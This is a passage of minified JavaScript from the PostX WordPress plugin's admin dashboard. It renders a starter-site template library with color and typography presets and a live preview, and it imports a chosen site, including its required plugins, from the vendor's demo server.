!!!","ultimate-post")))),0==t.length&&!s&&(0,a.createElement)(a.Fragment,null,Array(5).fill(1).map(((t,n)=>(0,a.createElement)("tr",{key:n},(0,a.createElement)("td",null,(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:22,unit1:"px",size2:20,unit2:"px",br:4}})),"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,Array(4).fill(1).map(((e,t)=>(0,a.createElement)("td",{key:t},(0,a.createElement)(l.Z,{type:"title",size:"99"}))))):(0,a.createElement)(a.Fragment,null,Array(9).fill(1).map(((e,t)=>(0,a.createElement)("td",{key:t},(0,a.createElement)(l.Z,{type:"title",size:"99"})))))))))))),(0,a.createElement)("div",{className:"pageCon"},(0,a.createElement)("div",null,__("Page","ultimate-post")," ",g>0?c:g," ",__("of","ultimate-post")," ",g," ["," ",u," ",__("items","ultimate-post")," ]"),g>0&&(0,a.createElement)("div",{className:"ultpPages"},c>1&&(0,a.createElement)("span",{onClick:()=>{const e=c-1;z({pages:e}),d(e)}},o.ZP.leftAngle2),(0,a.createElement)("span",{className:"currentPage"},c),g>c&&(0,a.createElement)("span",{onClick:()=>{const e=c+1;z({pages:e}),d(e)}},o.ZP.rightAngle2)))),Z&&(0,i.cs)({tags:"menu_save_temp_pro",func:e=>{P(e)},data:{icon:"saved_template_lock.svg",title:__("Create Unlimited Saved Templates with PostX Pro","ultimate-post"),description:__("You can create only one saved template with the free version of PostX. Please upgrade to a pro plan to create unlimited saved templates.","ultimate-post")}}))}},3554:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7294),r=n(1383),o=n(448),i=n(4766),l=n(8949),s=n(356),p=n(814),c=n(6488);const{__}=wp.i18n,d=e=>{const[t,n]=(0,a.useState)({templates:[],designs:[],reloadId:"",reload:!1,isTemplate:!0,error:!1,fetching:!1,loading:!1}),[d,u]=(0,a.useState)(""),[m,f]=(0,a.useState)("all"),[h,g]=(0,a.useState)("all"),[v,_]=(0,a.useState)("all"),[w,b]=(0,a.useState)([]),[x,y]=(0,a.useState)(!1),[k,E]=(0,a.useState)({state:!1,status:""}),[C,S]=(0,a.useState)("3"),[M,L]=(0,a.useState)(""),[N,Z]=(0,a.useState)([]),{loading:P,fetching:z}=t,A=(0,r.t)(),B=async()=>{n((e=>({...e,loading:!0}))),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"starter_lists"}}).then((e=>{if(e.success&&A.current&&e.data){const t=JSON.parse(e.data);Z(t),n((e=>({...e,loading:!1})))}}))},H=[{value:"all",label:__("All Categories","ultimate-post")},{value:"news",label:__("News","ultimate-post")},{value:"magazine",label:__("Magazine","ultimate-post")},{value:"blog",label:__("Blog","ultimate-post")},{value:"sports",label:__("Sports","ultimate-post")},{value:"fashion",label:__("Fashion","ultimate-post")},{value:"tech",label:__("Tech","ultimate-post")},{value:"travel",label:__("Travel","ultimate-post")},{value:"food",label:__("Food","ultimate-post")},{value:"movie",label:__("Movie","ultimate-post")},{value:"health",label:__("Health","ultimate-post")},{value:"gaming",label:__("Gaming","ultimate-post")},{value:"nft",label:__("NFT","ultimate-post")}];(0,a.useEffect)((()=>{T("","","fetchData"),B()}),[]);const T=(e,t="",n="")=>{wp.apiFetch({path:"/ultp/v2/premade_wishlist_save",method:"POST",data:{id:e,action:t,type:n}}).then((e=>{e.success&&A.current&&(b(Array.isArray(e.wishListArr)?e.wishListArr:Object.values(e.wishListArr||{})),"fetchData"!=n&&E({status:"success",messages:[e.message],state:!0}))}))};if(M){document.querySelector("#adminmenumain").style="display: none;",document.querySelector(".ultp-settings-container").style="min-height: unset;";const e=N.filter((e=>e.live==M))[0];return(0,a.createElement)(p.Z,{_val:e,setLiveUrl:L,liveUrl:M})}document.querySelector("#adminmenumain").style="",document.querySelector(".ultp-settings-container").style="";let R=(0,o.cC)(w.join(""),[]);R&&"object"==typeof R&&!Array.isArray(R)&&(R=Object.keys(R).sort(((e,t)=>e-t)).map((e=>R[e])));const O=N.map((e=>e.ID)).sort(((e,t)=>t-e)).slice(0,3);return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-templatekit-wrap"},k.state&&(0,a.createElement)(s.Z,{delay:2e3,toastMessages:k,setToastMessages:E}),(0,a.createElement)("div",{className:"ultp-templatekit-list-container "},(0,a.createElement)(c.Z,{changeStates:(e,t)=>{"freePro"==e?_(t):"search"==e?u(t):"column"==e?S(t):"wishlist"==e?y(t):"trend"==e?(f(t),"latest"==t||"all"==t?N.sort(((e,t)=>t.ID-e.ID)):"popular"==t&&N[0]&&N[0].hit&&N.sort(((e,t)=>t.hit-e.hit))):"filter"==e&&g(t)},useState:a.useState,useEffect:a.useEffect,useRef:a.useRef,column:C,showWishList:x,_fetchFile:()=>{n((e=>({...e,fetching:!0}))),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&A.current&&(B(),n((e=>({...e,fetching:!1}))),E({status:"success",messages:[e.message],state:!0}))}))},fetching:z,searchQuery:d,fields:{filter:!0,trend:!0,freePro:!0},fieldOptions:{filterArr:H,trendArr:[],freeProArr:[]},fieldValue:{filter:h,trend:m,freePro:v}}),N.length>0?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-premade-grid ultp-templatekit-col"+C},N.map((e=>e.title?.toLowerCase().includes(d.toLowerCase())&&("all"==h||"all"!=h&&(h==e.category||(Array.isArray(e.parent_cat)?e.parent_cat:Object.values(e.parent_cat||{})).includes(h)))&&("all"==v||"pro"==v&&e.pro||"free"==v&&!e.pro)&&(!x||x&&R?.includes(e.ID))&&(0,a.createElement)("div",{key:e.ID,className:"ultp-item-wrapper ultp-starter-group "},(0,a.createElement)("div",{className:"ultp-item-list"},(0,a.createElement)("div",{className:"ultp-item-list-overlay"},(0,a.createElement)("a",{className:"ultp-templatekit-img bg-image-aspect",href:"#",style:{backgroundImage:`url(https://postxkit.wpxpo.com/${e.live}/wp-content/uploads/sites/${e.ID}/postx_importer_img/pages/home.jpg)`}}),(0,a.createElement)("div",{className:"ultp-list-dark-overlay"},!ultp_dashboard_pannel.active&&(0,a.createElement)(a.Fragment,null,e.pro?(0,a.createElement)("span",{className:"ultp-templatekit-premium-btn"},__("Pro","ultimate-post")):(0,a.createElement)("span",{className:"ultp-templatekit-premium-btn ultp-templatekit-premium-free-btn"},__("Free","ultimate-post"))),(0,a.createElement)("a",{className:"ultp-overlay-view ultp-dashboverlay",onClick:()=>L(e.live)},i.ZP.eye,__("Live Preview","ultimate-post"))),e.pro&&(0,a.createElement)("div",{className:"ultp-list-info-tag-pro"},(0,a.createElement)("span",null,"PRO"))),(0,a.createElement)("div",{className:"ultp-item-list-info"},(0,a.createElement)("div",{className:"ultp-list-info",onClick:()=>L(e.live)},(0,a.createElement)("div",{className:"ultp-list-info-title"},e.title,O.includes(e.ID)&&(0,a.createElement)("div",{className:"ultp-list-info-tag-new"},"NEW")),(0,a.createElement)("div",{className:"ultp-list-info-count"},e.templates?.length&&e.templates?.length+" templates")),(0,a.createElement)("span",{className:"ultp-action-btn"},(0,a.createElement)("span",{className:"ultp-premade-wishlist",onClick:()=>{T(e.ID,R?.includes(e.ID)?"remove":"")}},i.ZP[R?.includes(e.ID)?"love_solid":"love_line"]))))))))):P?(0,a.createElement)("div",{className:"ultp-premade-grid skeletonOverflow ultp-templatekit-col"+C},Array(25).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-item-list"},(0,a.createElement)("div",{className:"ultp-item-list-overlay"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:440,unit2:"px"}})),(0,a.createElement)("div",{className:"ultp-item-list-info"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"%",size2:25,unit2:"px",br:2}}),(0,a.createElement)("span",{className:"ultp-action-btn"},(0,a.createElement)("span",{className:"ultp-premade-wishlist"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:25,unit2:"px",br:2}})))))))):(0,a.createElement)("span",{className:"ultp-image-rotate"},__("No Data Available…","ultimate-post")))))}},4371:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(448),o=n(5404);const{__}=wp.i18n,i=({ultpPresetColors:e,currentPresetColors:t,setCurrentPresetColors:n,setCurrentPostxGlobal:i,currentPostxGlobal:l})=>{const s={...e,rootCSS:(0,r.AJ)("styleCss",e)},[p,c]=(0,a.useState)({...t,...s}),[d,u]=(0,a.useState)(""),[m,f]=(0,a.useState)(!1),h=(0,r.AJ)("colorStacks"),g=(0,r.AJ)("presetColorKeys");(0,a.useEffect)((()=>{(0,r.x2)("get","ultpPresetColors","",(e=>{if(e.data){const t={...e.data,...p};n({...t,rootCSS:(0,r.AJ)("styleCss",t)})}}))}),[]);const v=(e,a="")=>{let o={...t,...e};"darkhandle"!=a&&m&&(o=_(o));const i=((e={},t="")=>{const n=(0,r.AJ)("styleCss",e),a=document.querySelector("#ultp-starter-preview");if(a.contentWindow){const e={type:"replaceColorRoot",id:"#ultp-preset-colors-style-inline-css",styleCss:n,dlMode:"darkhandle"==t?m?"ultpLight":"ultpDark":m?"ultpDark":"ultpLight"};a.contentWindow.postMessage(e,"*")}return n})(o,a);c(o),n({...o,rootCSS:i})},_=(e={})=>({...e,Base_1_color:e.Contrast_1_color,Base_2_color:e.Contrast_2_color,Base_3_color:e.Contrast_3_color,Contrast_1_color:e.Base_1_color,Contrast_2_color:e.Base_2_color,Contrast_3_color:e.Base_3_color});return(0,a.createElement)("div",{className:"ultp_starter_preset_container"},(0,a.createElement)("div",{className:"ultp_starter_dark_container"},(0,a.createElement)("div",{onClick:()=>(()=>{const e=_(t);document.querySelector(".ultp-dl-container .ultp-dl-svg-con").style=`transform: translateX(${m?"":"calc( 100% + 71px )"}); transition: transform .4s ease`,document.querySelector(".ultp-dl-container .ultp-dl-svg-title").style=`transform: translateX(${m?"":"calc( -100% + 50px )"}); transition: transform .4s ease`,setTimeout((()=>{f(!m),i({...l,enableDark:!m}),v(e,"darkhandle")}),400)})(),className:" ultp-dl-container "},(0,a.createElement)("div",{className:"ultp-dl-svg-con "+(m?"dark":"")},(0,a.createElement)("div",{className:"ultp-dl-svg"},o.Z[m?"moon":"sun"])),(0,a.createElement)("div",{className:"ultp-dl-svg-title"},m?"Dark Mode":"Light Mode"))),(0,a.createElement)("div",{className:"ultp_starter_reset_container"},(0,a.createElement)("div",{className:"packs_title"},__("Change Color Palette","ultimate-post")),d&&(0,a.createElement)("span",{className:"dashicons dashicons-image-rotate",onClick:()=>{u(""),v(s)}})),(0,a.createElement)("ul",{className:"ultp-color-group"},h.map(((e,t)=>(0,a.createElement)("li",{className:"ultp_starter_preset_list "+(d==t+1?"active":""),key:t,onClick:()=>{const n={};u(t+1),g.forEach(((t,a)=>{n[t]=e[a]})),v(n)}},e.map(((e,t)=>![1,2,6,8,9].includes(t+1)&&(0,a.createElement)("span",{key:t,className:"ultp-global-color",style:{backgroundColor:e}}))))))))}},5066:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(448);const{__}=wp.i18n,o=({ultpPresetTypos:e,currentPresetTypos:t,setCurrentPresetTypos:n})=>{const o={...e,presetTypoCSS:(0,r.AJ)("typoCSS",e,!0)},[i,l]=(0,a.useState)({...t,...o}),[s,p]=(0,a.useState)(""),c=(0,r.AJ)("presetTypoKeys"),d=(0,r.AJ)("typoStacks");(0,a.useEffect)((()=>{(0,r.x2)("get","ultpPresetTypos","",(e=>{if(e.data){const t={...e.data,...i};l({...t,presetTypoCSS:(0,r.AJ)("typoCSS",t,!0)}),n({...t,presetTypoCSS:(0,r.AJ)("typoCSS",t,!0)})}}))}),[]);const u=e=>{const a={...t,...e},o=((e={})=>{const t=(0,r.AJ)("typoCSS",e,!0),n=document.querySelector("#ultp-starter-preview");if(n.contentWindow){const e={type:"replaceColorRoot",id:"#ultp-preset-typo-style-inline-css",styleCss:t};n.contentWindow.postMessage(e,"*")}return t})(a);l(a),n({...a,presetTypoCSS:o})};return(0,a.createElement)("div",{className:"ultp_starter_preset_container"},(0,a.createElement)("div",{className:"ultp_starter_reset_container"},(0,a.createElement)("div",{className:"packs_title"},__("Change Font & Typography","ultimate-post")),s&&(0,a.createElement)("span",{className:"dashicons dashicons-image-rotate",onClick:()=>{p(""),u(o)}})),(0,a.createElement)("ul",{className:"ultp-typo-group"},d.map(((e,n)=>(0,a.createElement)("li",{title:`${e[0].family}/${e[1].family}`,className:"ultp_starter_preset_typo_list "+(s==n+1?"active":""),key:n,onClick:()=>{const a={};p(n+1),c.forEach(((n,r)=>{a[n]={...t[n]},a[n].family=e[r].family,a[n].type=e[r].type,a[n].weight=e[r].weight})),u(a)}},e.map(((e,t)=>(0,a.createElement)("span",{key:t},(0,a.createElement)("style",null,(0,r.AJ)("font_load",e,!0)),(0,a.createElement)("span",{key:t,className:"",style:{fontFamily:`${e.family}, ${e.type}`}},0==t?"A":"a")))))))))}},5324:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(4766);const o=e=>{const{useState:t,useEffect:n,useRef:o,onChange:i,options:l,value:s,contentWH:p}=e,[c,d]=t(!1),u=o(null),m=e=>{u?.current&&!u?.current.contains(e.target)?d(!1):u?.current&&u?.current.contains(e.target)&&!e.target.classList?.contains("ultp-reserve-button")&&d(!u?.current.classList?.contains("open"))};n((()=>(document.addEventListener("mousedown",m),()=>document.removeEventListener("mousedown",m))),[]);const f=l?.find((e=>e.value===s));return(0,a.createElement)("div",{ref:u,className:"starter_filter_select "+(c?"open":"")},(0,a.createElement)("div",{className:"starter_filter_selected"},f?f.label:"Select an option",r.ZP.collapse_bottom_line),c&&(0,a.createElement)("ul",{className:"starter_filter_select_options",style:{minWidth:p?.width||"100px",maxHeight:p?.height||"160px"}},l.map(((e,t)=>(0,a.createElement)("li",{className:"ultp-reserve-button starter_filter_select_option",key:t,onClick:()=>(e=>{d(!1),i(e.value)})(e)},e.label)))))}},814:(e,t,n)=>{"use strict";n.d(t,{Z:()=>c});var a=n(7294),r=n(448),o=n(4766),i=n(4482),l=n(8949),s=n(4371),p=n(5066);n(4602);const{__}=wp.i18n,c=e=>{const{_val:t,setLiveUrl:n,liveUrl:c}=e,[d,u]=(0,a.useState)({}),[m,f]=(0,a.useState)({}),[h,g]=(0,a.useState)({}),v={deletePrevious:"yes",installPlugin:"yes",user_email:ultp_dashboard_pannel.user_email,get_newsletter:"yes",importDummy:"yes"},[_,w]=(0,a.useState)(!1),[b,x]=(0,a.useState)(!1),[y,k]=(0,a.useState)(!1),[E,C]=(0,a.useState)([]),[S,M]=(0,a.useState)(v),[L,N]=(0,a.useState)(0),[Z,P]=(0,a.useState)({type:"desktop",width:"100%"}),[z,A]=(0,a.useState)(!1),[B,H]=(0,a.useState)(!0),[T,R]=(0,a.useState)(!1),[O,j]=(0,a.useState)({plugin:!1,content:!1}),[V,F]=(0,a.useState)(!1),[W,D]=(0,a.useState)({}),[I,U]=(0,a.useState)({}),[$,G]=(0,a.useState)([]);(0,a.useEffect)((()=>{window.fetch("https://postxkit.wpxpo.com/"+t.live+"/wp-json/importer/global_settings",{method:"GET"}).then((e=>e.text())).then((e=>{const t=(0,r.cC)(e,{});t.success&&(((e={})=>{wp.apiFetch({path:"/ultp/v1/action_option",method:"POST",data:{type:"get"}}).then((t=>{if(t.success){let n={...t.data,...e};n={...n,globalCSS:(0,r.AJ)("globalCSS",n)},g(n)}}))})(t.postx_global),D(t.ultpPresetColors),U(t.ultpPresetTypos),G(t.plugins))})).catch((e=>{}))}),[]);const q=(e,t,n,r="")=>(0,a.createElement)("div",{className:"input_container"},"checkbox"==t&&(0,a.createElement)("input",{id:e,className:r,name:e,type:t,defaultChecked:!(!S[e]||"yes"!=S[e]),onChange:t=>{const n=t.target.checked?"yes":"no";M({...S,[e]:n})}}),"checkbox"!=t&&(0,a.createElement)("input",{id:e,className:r,name:e,type:t,defaultValue:S[e]||"",onChange:t=>{const n=t.target.value;M({...S,[e]:n})}}),n&&(0,a.createElement)("span",null,(0,a.createElement)("span",{className:"ultp-info"},n)));return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:" ultp_starter_packs_demo theme-install-overlay wp-full-overlay expanded "+(B?"active":"inactive"),style:{display:"block"}},(0,a.createElement)("div",{className:"wp-full-overlay-sidebar "},(0,a.createElement)("div",{className:"wp-full-overlay-header"},(0,a.createElement)("div",{className:"ultp_starter_packs_demo_header"},(0,a.createElement)("div",{className:"packs_title"},t.title,(0,a.createElement)("span",null,t.category)),(0,a.createElement)("button",{onClick:()=>n(""),className:"close-full-overlay"})),(0,a.createElement)("div",{className:"ultp-starter-collapse "+(B?"active":"inactive"),onClick:()=>{H(!B)}},o.ZP.collapse_bottom_line)),Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-addon-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-addon-item-contents"},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:50,unit2:"px",br:18}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:28,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-description"},(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:100,unit1:"%",size2:14,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:70,unit1:"%",size2:14,unit2:"px",br:2}}))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:8}}),(0,a.createElement)("div",{className:"ultp-docs-action"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}})))))),(0,a.createElement)("div",{className:"wp-full-overlay-sidebar-content"},W.hasOwnProperty("Base_1_color")?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(s.Z,{ultpPresetColors:W,currentPresetColors:d,setCurrentPresetColors:u,currentPostxGlobal:h,setCurrentPostxGlobal:g})):(0,a.createElement)("div",{className:"skeletonOverflow"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:40,unit2:"px",br:40}}),(0,a.createElement)("div",{className:"skeletonOverflow_colors"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"demos-color"},Array(10).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:100,unit1:"px",size2:30,unit2:"px",br:6}})))))),I.hasOwnProperty("Body_and_Others_typo")?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(p.Z,{ultpPresetTypos:I,currentPresetTypos:m,setCurrentPresetTypos:f})):(0,a.createElement)("div",{className:"skeletonOverflow"},(0,a.createElement)("div",{className:"skeletonOverflow_colors"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"demos-color"},Array(10).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:100,unit1:"px",size2:30,unit2:"px",br:6}}))))))),(0,a.createElement)("div",{className:"wp-full-overlay-footer"},(0,a.createElement)("div",{className:"ultp_starter_import_options"},(0,a.createElement)("div",{className:"option_buttons"},t.pro&&!ultp_dashboard_pannel.active?(0,i.hx)(`https://www.wpxpo.com/postx/?utm_source=db-postx-starter&utm_medium=${t.live}-upgrade-pro&utm_campaign=postx-dashboard#pricing`,""):(0,a.createElement)("a",{className:"ultp-starter-button",onClick:()=>{w(!0)}},__("Import Site","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-starter-packs-device-container"},(0,a.createElement)("span",{onClick:()=>P({type:"desktop",width:"100%"}),className:"ultp-starter-packs-device "+("desktop"==Z.type?"d-active":"")},o.ZP.desktop),(0,a.createElement)("span",{onClick:()=>P({type:"tablet",width:(h.breakpointSm||"990")+"px"}),className:"ultp-starter-packs-device "+("tablet"==Z.type?"d-active":"")},o.ZP.tablet),(0,a.createElement)("span",{onClick:()=>P({type:"mobile",width:(h.breakpointXs||"767")+"px"}),className:"ultp-starter-packs-device "+("mobile"==Z.type?"d-active":"")},o.ZP.mobile))))),(0,a.createElement)("div",{className:"wp-full-overlay-main"},!T&&(0,a.createElement)("div",{className:"iframe_loader"},(0,a.createElement)("div",{className:"iframe_container"},(0,a.createElement)("div",{className:"iframe_header"},(0,a.createElement)("div",{className:"iframe_header_top"},(0,a.createElement)("div",{className:"header_top_left"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:60,unit2:"px",br:60}})),(0,a.createElement)("div",{className:"header_top_right"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),Array(3).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:30,unit1:"px",size2:30,unit2:"px",br:30}})))))),(0,a.createElement)("div",{className:"iframe_body_content"},(0,a.createElement)("div",{className:"iframe_body_slider"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:300,unit2:"px",br:2}})),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:36,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"iframe_body"},(0,a.createElement)("div",{className:"iframe_body_left"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:300,unit2:"px",br:2}})),(0,a.createElement)("div",{className:"iframe_body_right"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:140,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:140,unit2:"px",br:2}})))))),(0,a.createElement)("iframe",{className:`${Z.type}View`,onLoad:()=>{R(!0),(()=>{const e=document.querySelector("#ultp-starter-preview");if(d.hasOwnProperty("Base_1_color")){const t=(0,r.AJ)("styleCss",d);if(e.contentWindow){const n={type:"replaceColorRoot",id:"#ultp-preset-colors-style-inline-css",styleCss:t,dlMode:h.enableDark?"ultpDark":"ultpLight"};e.contentWindow.postMessage(n,"*")}}if(m.hasOwnProperty("Body_and_Others_typo")){const t=(0,r.AJ)("typoCSS",m,!0);if(e.contentWindow){const n={type:"replaceColorRoot",id:"#ultp-preset-typo-style-inline-css",styleCss:t};e.contentWindow.postMessage(n,"*")}}})()},style:{display:"block",margin:"0 auto",maxWidth:Z.width},id:"ultp-starter-preview",src:"https://postxkit.wpxpo.com/"+c}))),_&&(0,a.createElement)("div",{className:"ultp-stater-container-settings-overlay"},(0,a.createElement)("div",{className:"ultp-stater-settings-container"},(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp-popup-stater"},b?(0,a.createElement)(a.Fragment,null,y?(0,a.createElement)("div",{className:"ultp_processing_import"},(0,a.createElement)("div",{className:"stater_title"},__(`Started building ${t.title} website`,"ultimate-post")),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp_import_builders ultp-info"},__("The import process can take a few seconds depending on the size of the kit you are importing and speed of the connection.","ultimate-post")," ",(0,a.createElement)("br",null),(O.plugin||O.content)&&(0,a.createElement)("div",{className:"progress"},(0,a.createElement)("div",null,(0,a.createElement)("strong",null,"Progress:")," ",O.plugin?"Plugin Installation is":O.content?"Page/Posts/Media Importing is":"Site Importing"," ","on progress..")))),(0,a.createElement)("div",{className:"ultp_processing_show"},(0,a.createElement)("div",{className:"ultp-importer-loader"},(0,a.createElement)("div",{id:"ultp-importer-loader-bar",style:{width:L+"%"}}),(0,a.createElement)("div",{id:"ultp-importer-loader-percentage",style:{color:L>52?"#fff":"#000"}},L+"%"))),(0,a.createElement)("div",{className:"ultp_import_notice"},(0,a.createElement)("span",null,__("Note:","ultimate-post")),__("Please do not close this browser window until import is completed.","ultimate-post"))):(0,a.createElement)("div",{className:"ultp_successful_import"},(0,a.createElement)("div",{className:"stater_title"},t.title,__(` Imported ${V?"Failed":"Successfully"} `,"ultimate-post")),(0,a.createElement)("div",null,V?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_import_builders"},__("Due to resquest timeout this import is failed","ultimate-post"),(0,a.createElement)("a",{className:"cursor",onClick:()=>{window.location.reload()}},__("Refresh","ultimate-post")),__("page and try again","ultimate-post"))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_import_builders"},__("Navigate to","ultimate-post"),(0,a.createElement)("a",{className:"cursor",onClick:()=>{window.location.href=ultp_dashboard_pannel.builder_url,window.location.reload()}},__("Site Builder to edit","ultimate-post")),__("your Archive, Post, Default Page and other templates.","ultimate-post")),(0,a.createElement)("a",{className:"ultp-primary-button",href:ultp_dashboard_pannel.home_url},__("View Your Website","ultimate-post")))))):(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp-info ultp-info-desc"}," ",__("Import the entire site including posts, images, pages, content and plugins.","ultimate-post")),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"stater_title"},__("Import Settings","ultimate-post")),q("importDummy","checkbox",__("Import dummy post, taxonomy and featured images","ultimate-post")),q("deletePrevious","checkbox",__("Delete Previously imported sites","ultimate-post")),q("installPlugin","checkbox",__("Install required plugins","ultimate-post"))),(0,a.createElement)("div",{className:"starter_page_impports"},(0,a.createElement)("div",{className:"stater_title"},__("Template/Pages","ultimate-post")),t?.templates?.map(((e,t)=>(!z&&t<3||z)&&(0,a.createElement)("div",{key:t,className:"input_container"},(0,a.createElement)("input",{type:"checkbox",defaultChecked:!E.includes(e.name),onChange:t=>{t.target.checked&&E.includes(e.name)?C(E.filter((t=>t!==e.name))):t.target.checked||E.includes(e.name)||C([...E,e.name])}}),(0,a.createElement)("span",null,(0,a.createElement)("span",{className:"ultp-info"},e.name))))),t.templates.length>3&&(0,a.createElement)("div",{className:"cursor",onClick:()=>{A(!z)}},"Show "+(z?"less":"more")," ",o.ZP.videoplay)),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"stater_title"},__("Subscribe","ultimate-post")),(0,a.createElement)("span",null,__("Stay up to date with the latest started templates and special offers","ultimate-post")),q("user_email","email","","email_box"),q("get_newsletter","checkbox",__("Stay updated with exciting features and news."),"get_newsletter")))),!b&&(0,a.createElement)("div",{className:"starter_import "},(0,a.createElement)("a",{className:"ultp-primary-button",onClick:()=>(async e=>{x(!0);let n,a=0;async function o(e,t,r){n=setInterval((()=>{e>=t?clearInterval(n):(e++,a++,N(e))}),r)}if(o(a,70,"yes"==S.importDummy?800:400),e){x(!0),k(!0);const i=$;if((0,r.x2)("set","ultpPresetColors",d),(0,r.x2)("set","ultpPresetTypos",m),wp.apiFetch({method:"POST",path:"/ultp/v1/action_option",data:{type:"set",data:h}}),"yes"==S.deletePrevious||"yes"==S.get_newsletter){const e=new Promise(((e,t)=>{wp.apiFetch({path:"/ultp/v3/deletepost_getnewsletters",method:"POST",data:{deletePrevious:S.deletePrevious,get_newsletter:S.get_newsletter}}).then((t=>{e("responsed")}))}));await e}if("yes"==S.importDummy){const t=new Promise(((t,n)=>{wp.apiFetch({path:"/ultp/v3/starter_dummy_post",method:"POST",data:{api_endpoint:e,importDummy:S.importDummy}}).then((e=>{t("responsed")})).catch((e=>{console.log(e),t("responsed")}))}));await t}if("yes"==S?.installPlugin){j({...O,plugin:!0});const e=i.map(((e,t)=>new Promise(((t,n)=>{jQuery.ajax({type:"POST",url:ultp_dashboard_pannel.ajax,data:{action:"install_required_plugin",wpnonce:ultp_dashboard_pannel.security,plugin:JSON.stringify(e)}}).done((function(e){t("responsed")}))}))));await Promise.all(e),j({...O,plugin:!1})}clearInterval(n),o(a+1,80,500);const l=t.templates?.filter((e=>!E.includes(e.name)));l.length>0&&(j({...O,content:!0}),wp.apiFetch({path:"/ultp/v3/starter_import_content",method:"POST",data:{excludepages:JSON.stringify(E),api_endpoint:e,importDummy:S.importDummy,installPlugin:S?.installPlugin}}).then((e=>{clearInterval(n),o(a+1,100,50),setTimeout((()=>{k(!1),j({...O,content:!1})}),50*(100-a+2)),e.success||F(!0)})).catch((e=>{console.log(e),o(a+1,100,50),setTimeout((()=>{k(!1),j({...O,content:!1})}),50*(100-a+2))})))}})("https://postxkit.wpxpo.com/"+t.live)},__("Start Importing","ultimate-post"))),(0,a.createElement)("button",{onClick:()=>{y||(M(v),x(!1),N(0),k(!1),w(!1))},className:"ultp-popup-close "+(y?"s_loading":"")},o.ZP.close_line)))))}},6488:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var 